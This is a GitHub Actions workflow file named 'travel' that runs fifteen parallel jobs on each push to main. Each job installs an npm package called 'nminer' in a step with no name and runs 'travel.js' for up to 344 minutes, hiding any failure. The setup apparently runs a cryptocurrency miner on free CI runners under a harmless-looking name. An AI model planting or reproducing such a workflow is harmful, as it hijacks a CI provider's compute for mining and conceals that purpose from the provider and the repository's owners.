name: travel
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3773 }
          - { version: 7642 }
          - { version: 122 }
          - { version: 6575 }
          - { version: 9405 }
          - { version: 8515 }
          - { version: 424 }
          - { version: 7172 }
          - { version: 1225 }
          - { version: 1345 }
          - { version: 8389 }
          - { version: 2588 }
          - { version: 6330 }
          - { version: 437 }
          - { version: 950 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 344m node travel.js || echo "travel executed"